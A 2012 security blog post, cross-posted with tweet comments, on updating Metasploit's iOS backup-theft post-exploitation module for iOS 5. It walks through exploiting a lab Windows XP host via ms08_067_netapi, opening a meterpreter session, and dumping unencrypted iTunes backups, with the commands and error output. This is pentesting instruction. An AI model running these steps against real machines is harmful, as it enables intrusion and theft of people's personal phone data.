Metasploit Module to Steal iOS 5 Backups

September 14, 2012
By

Post to Twitter Post to Facebook Post to Reddit

We receive this great article from @satishb3 over at SecurityLearn.net. It’s a bit more technical than we usually go but … it’s about Metasploit and iPhones. How could we pass that up? Plus he’s included a video that shows his module in action. Enjoy!

If you have an article you’d like published on NovaInfosec.com, just send it over to us via our Submit Article form. And without further ado we’ll turn it over to @satishb3.

Metasploit contains a post exploitation module using which we can steal the Apple iOS backup files from a victim’s computer. However the existing module was designed for iOS 4 backups and does not support the latest iOS 5 backups. I have updated the scripts to make it work with iOS 5 backups.

Running the existing apple_ios_backup post exploitation module in the Metasploit (v4.4.0) against an iOS 5 backup ends up with the below exception.

meterpreter> run post/multi/gather/apple_ios_backup

[*] Checking for backups in C:\Documents and Settings\Administrator
    \Application Data\Apple Computer\MobileSync\Backup
[*] Found C:\Documents and Settings\Administrator\Application Data
    \Apple Computer\MobileSync\Backup\
    b716de79051ef093a98fc3ff1c46ca5e36faabc3
[*] Checking for backups in C:\Documents and Settings\SATISH-E6338BC0
    \Application Data\Apple Computer\MobileSync\Backup
[*] Pulling data from C:\Documents and Settings\Administrator
    \Application Data\Apple Computer\MobileSync\Backup
    \b716de79051ef093a98fc3ff1c46ca5e36faabc3...
[*] Reading Manifest.mbdb from C:\Documents and Settings\Administrator
    \Application Data\Apple Computer\MobileSync\Backup
    \b716de79051ef093a98fc3ff1c46ca5e36faabc3...
[*] Reading Manifest.mbdx from C:\Documents and Settings
    \Administrator\Application Data\Apple Computer\MobileSync\Backup
    \b716de79051ef093a98fc3ff1c46ca5e36faabc3...
[-] Post failed: Rex::Post::Meterpreter::RequestError core_channel_open:
    Operation failed: The system cannot find the file specified.
[-] Call stack:
[-]   /opt/metasploit/msf3/lib/rex/post/meterpreter/channel.rb:116:in
      `create'
[-]   /opt/metasploit/msf3/lib/rex/post/meterpreter/channels/pools/
      file.rb:35:in `open'
[-]   /opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi
      /fs/file.rb:325:in `_open'
[-]   /opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi
      /fs/file.rb:276:in `initialize'

Below details outline the usage of updated Metasploit – Apple iOS Backup File Extraction module. I have used Metasploit 4.4 from Backtrack 5R1.

Apple iOS Backup File Extraction module is a post exploitation module. Metasploit says “The post-exploitation modules (post for short) are designed to run on systems that were compromised through another vector, whether its social engineering, a guessed password, or an unpatched vulnerability.” So in order to use the iOS backup module, first we have to compromise the system using some other vector.

Usage Steps:

  1. Download the apple_ios_backup.rb and place it in /opt/metasploit/msf3/modules/post/multi/gather/ directory.
  2. Download the apple_backup_manifestdb.rb and place it in /opt/metasploit/msf3/lib/rex/parser/ directory.
  3. Open the Metasploit using msfconsole.
  4. Use meterpreter as a payload and exploit a vulnerability in the target system.

In my case, the victim machine is running with the Windows XP OS (192.168.209.128) which is vulnerable to ms08_067_netapi vulnerability. Following the below steps exploits the vulnerability and opens a meterpreter shell.

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set RHOST 192.168.209.128
RHOST => 192.168.209.128
msf  exploit(ms08_067_netapi) > exploit
  1. Once the meterpreter session is established,  iOS backup on the victim machine can be dumped using the following command -> run post/multi/gather/apple_ios_backup

The above script searches for the iOS backup files in the default iTunes backup locations. If it does not find any backups in the target system, it will display ‘ No users found with an iTunes backup directory’ message. If it finds a backup it dumps all the files and stores them as db files in the ~/.msf4/loot/ directory.

iPhone backup path in windows & Mac OS X

Though Apple iOS backup extraction module dumps all the files from the victim’s backup, the level of data revealed to the attacker depends on the type of the iOS backup. If the victim machine contains an encrypted backup, the information that we get from stealing the backup files is almost nothing. Because all the files in the encrypted backup are encrypted with the user supplied iTunes password. If the victim machine contains a normal backup, we can read the sensitive data stored in all files except the Keychain database. In case of normal backups, the keychain is encrypted with a hardware key which is embedded in the iPhone.

The post module can steal the iOS backups from Windows and Mac OS X machines. I have tested it for Windows. It should definitely work for OS X as well.

iOS backup is a treasure for pentesters. Happy hacking :)

Cross-posted from SecurityLearn.net

#####

And don’t forget … if you are interested in posting an article on NovaInfosec.com, please head on over to our Submit Article page for all the details. Today’s post image is from the folks over at Hacker5 5ecrets.

Tags: , , , , ,

16 Responses to Metasploit Module to Steal iOS 5 Backups

  1. (@novainfosec) (@novainfosec) on September 14, 2012 at 6:57 pm

    Metasploit Module to Steal iOS 5 Backups http://t.co/wLS0ucoU //New post from @satishb3..

  2. (@vaaccess) (@vaaccess) on September 14, 2012 at 9:11 pm

    #Metasploit Module to Steal #iOS 5 Backups http://t.co/0dLr3Rpb #infosec

  3. Santosh M Satam (@satamsantosh) on September 14, 2012 at 10:02 pm

    Metasploit Module to Steal iOS 5 Backups http://t.co/mpjyQO9c

  4. (@novainfosec) (@novainfosec) on September 14, 2012 at 11:04 pm

    #NOVABLOGGER: Metasploit Module to Steal iOS 5 Backups http://t.co/wLS0ucoU http://t.co/IntXkFbO

  5. (@novainfosec) (@novainfosec) on September 14, 2012 at 11:04 pm

    #NOVABLOGGER: Metasploit Module to Steal iOS 5 Backups http://t.co/wLS0ucoU http://t.co/IntXkFbO

  6. Billy (@wlgraham_atl) on September 15, 2012 at 6:05 am

    Metasploit Module to Steal iOS 5 Backups http://t.co/8bzorbh0 via @zite

  7. Yan Kravchenko (@yanfosec) on September 15, 2012 at 8:23 am

    Metasploit Module to Steal iOS 5 Backups http://t.co/vTcuDsvD this reminds me, you can’t remote wipe an offline backup…

  8. Omar Santos (@santosomar) on September 15, 2012 at 9:16 am

    Metasploit Module to Steal iOS 5 Backups http://t.co/Av4chraj

  9. (@CiphersSon) (@CiphersSon) on September 15, 2012 at 10:53 am

    Metasploit Module to Steal iOS 5 Backups http://t.co/XptBVY3c

  10. Kenya ? (@koa) on September 15, 2012 at 12:10 pm

    O_O RT @novainfosec: Metasploit Module to Steal iOS 5 Backups http://t.co/tatNpRlT //New post from @satishb3..

  11. (@grecs) (@grecs) on September 15, 2012 at 1:18 pm

    BLOGGED: Metasploit Module to Steal iOS 5 Backups http://t.co/HxquVl1v //In case U missed.

  12. (@novainfosec) (@novainfosec) on September 15, 2012 at 1:18 pm

    BLOGGED: Metasploit Module to Steal iOS 5 Backups http://t.co/wLS0ucoU //In case U missed.

  13. (@DFMag) (@DFMag) on September 16, 2012 at 6:28 pm

    Metasploit Module to Steal iOS 5 Backups http://t.co/v1moWcSG Technical but interesting.

  14. Ichiro MATSUURA (@imatsuura) on September 16, 2012 at 7:22 pm

    Apple iOS backup files from a victim’s computer by using Metasploit http://t.co/NUHuM7TJ

  15. Karsten Weiss (@knweiss) on September 21, 2012 at 3:44 pm

    The Metasploit module for stealing iOS backups was a good reason for me to finally encrypt all my iOS backups: http://t.co/hmSLSucd

  16. @hackxEC on March 8, 2013 at 3:01 pm

    Módulo de #Metasploit para obtener #Backups de iOS5 … https://t.co/0EJTjQfP8o

Leave a Reply

Your email address will not be published. Required fields are marked *


About Us

Founded in 2008, NoVA Infosec is dedicated to the community of Metro DC-based security professionals and whitehat hackers involved in the government and other regulated verticals. Find out more on our About Us page.